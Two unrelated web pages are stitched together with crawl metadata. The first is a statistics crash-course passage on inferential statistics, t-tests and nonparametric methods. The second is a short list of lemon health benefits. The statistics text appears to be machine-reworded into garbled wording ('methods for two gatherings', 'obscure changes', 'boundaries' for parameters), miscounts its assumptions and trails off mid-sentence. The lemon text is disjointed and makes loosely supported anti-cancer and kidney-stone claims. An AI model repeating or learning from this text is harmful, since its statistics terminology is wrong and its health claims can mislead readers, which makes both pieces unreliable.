Inferential statistics is a type of statistics used to explain the importance of Descriptive statistics. That suggests once the data has been accumulated, analyzed, and summarized then we utilize these subtleties to depict the significance of the assembled data. There are a few types of inferential statistics that are used broadly and are very easy to decipher. It grants you to make desires by accepting a little model rather than working on the whole populace. For example, One-sample test of difference/One sample hypothesis test, Contingency Tables and Chi-Square Statistic, T-test, and so on. (Recommended blog: Introduction to Bayesian Statistics) 4. What is T-Test? Here, we will read in detail about the T-test which is a type of inferential statistics. The T-test is used to decide whether there is a critical distinction between the methods for two gatherings, which might be connected in specific details. To decide the statistical significance a t-test looks at the t-statistics, the t-distribution values, and the degrees of freedom, and to direct a test with three or more means, one should use an analysis of variance. It is generally used when the data set, like the data set recorded as the result from flipping a coin 100 times, would follow an ordinary circulation and may have obscure changes. A t-test is used as a hypothesis testing tool, which permits testing of a suspicion relevant to a populace. Therefore, figuring a t-test requires three key information esteems. They incorporate the contrast between the mean values from every data set which is sometimes called a mean difference, the standard deviation of each faction, and the number of data values of each faction. Various types of t-test can be conducted relying on the data and also the type of analysis needed. (Related blog: T-test vs Z-test) The main assumption made with respect to t-tests concerns the scale of measurement. The assumption for a t-test is that the scale of measurement applied to the information gathered follows a constant or ordinal scale, for example, the scores for an IQ test. The third supposition that is the information, when plotted, brings about an ordinary appropriation, bell-shaped distribution curve. 5. What are Nonparametric Statistics? Nonparametric statistics allude to a factual strategy wherein the information is not expected to come from endorsed models that are dictated by few boundaries; instances of such models incorporate the normal distribution model and the linear regression model. Sometimes it utilizes information that is ordinal, which means it doesn't depend on numbers, instead of on positioning or request of sorts. This kind of survey is always best suited when assuming the order of something, where even if the numerical data changes, the outcomes. (Also read: What is Econometrics?) Nonparametric descriptive statistics, statistical models, inference, and statistical tests, all come under nonparametric statistics. The model structure of nonparametric models isn't indicated from the earlier, however, is rather decided from the information. The term nonparametric isn't intended to suggest that such models need boundaries, yet rather than the number and nature of the boundaries are adaptable and not fixed ahead of time. Thus, a histogram is an illustration of a nonparametric gauge of the probability distribution. (Recommend blog: Statistical Data Analysis Techniques) So, for more clearance have a look at an example, assume a monetary investigator who wishes to appraise the value at risk or VaR of a venture. The analyst accumulates income information from 100's of comparative ventures throughout a comparative time horizon. Instead of assuming that the income follows an ordinary distribution, he uses the histogram to gauge the distribution nonparametrically. The fifth percentile of this histogram at that point gives the investigator a nonparametric gauge of VaR. Questionnaire: Analyze Yourself What is the probability in statistics? What is the reliability? How to calculate mean, median, and mode? Describe the types of data. What is descriptive statistics? Write five assumptions of the t-test. Explain nonparametric statistics with examples.
<urn:uuid:ef3b4832-43a4-4aae-bc1c-fe409966f17a>
CC-MAIN-2022-40
https://www.analyticssteps.com/blogs/crash-course-statistics
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337421.33/warc/CC-MAIN-20221003133425-20221003163425-00669.warc.gz
en
0.922296
2,050
3.671875
4
Lemon Health benefits and Uses gives you certain tips on vitamin in lemon and to maintain good health. One lemon provides about 31 mg of vitamin C, which is 51% of your recommended daily intake . Plant chemicals found in lemons, namely Hesperidin and Diosmin lower cholesterol. Just 1/2 a cup (4 Oz) of lemon juice per day can provide enough citric acid to help prevent stone formation. Some studies also found that lemonade effectively prevented kidney stones. However, the compounds prevented malignant tumors from developing in the tongues, lungs and colons of rodents. D-limonene anti-cancer compound found in lemon oil Lemons contain both vitamin C and citric acid. They may protect against anemia by ensuring you absorb as much iron as possible from your diet. To get the Lemon Health benefits of fiber from lemons, you need to eat a lot of them, including their pulp and skin.
<urn:uuid:583c5756-b3a0-40f5-8f6f-a7e55f339123>
CC-MAIN-2022-40
https://areflect.com/2018/02/06/lemon-health-benefits-and-uses/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337529.69/warc/CC-MAIN-20221004215917-20221005005917-00669.warc.gz
en
0.933264
196
2.640625
3